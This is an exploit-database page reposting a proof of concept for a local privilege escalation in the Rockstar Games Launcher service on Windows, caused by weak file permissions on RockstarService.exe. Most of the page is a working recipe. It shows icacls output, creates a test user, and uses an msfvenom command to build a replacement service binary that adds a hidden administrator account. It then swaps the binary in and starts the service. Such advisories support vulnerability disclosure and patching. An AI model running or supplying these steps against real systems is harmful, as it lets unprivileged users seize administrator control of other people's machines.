Rockstar service insecure file permissions Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-04-05 | Type : local | Platform : windows
This exploit / vulnerability Rockstar service insecure file permissions is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Rockstar Service - Insecure File Permissions
# Date: 2020-04-02
# Exploit Author: George Tsimpidas
# Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher
# Version Patch: 1.0.37.349
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362

Vulnerability Description:

RockstarService.exe suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege"

#PoC

D:\Launcher> icacls .\Launcher.exe

.\Launcher.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
BUILTIN\Users:(I)(RX)

#1. Create low privileged user & Login to that user

C:\>net user lowpriv Password123! /add
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None

#2. Move the RockstarService.exe to a new name

D:\Launcher> move RockstarService.exe RockstarService.exe.bk
1 file(s) moved.

#3. Create malicious binary on kali linux with MSF

msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe

#4. Transfer created 'RockstarService.exe' to the Windows Host

#5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one

#6. Now start the Service

Command : net start 'Rockstar Service'

Now check out that the user has been registered to the system and added to the local group of Administrators

C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr
/v "Full"

User name placebo
Local Group Memberships *Administrators *Users
Global Group memberships *None

Rockstar service insecure file permissions


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Rockstar service insecure file permissions Vulnerability / Exploit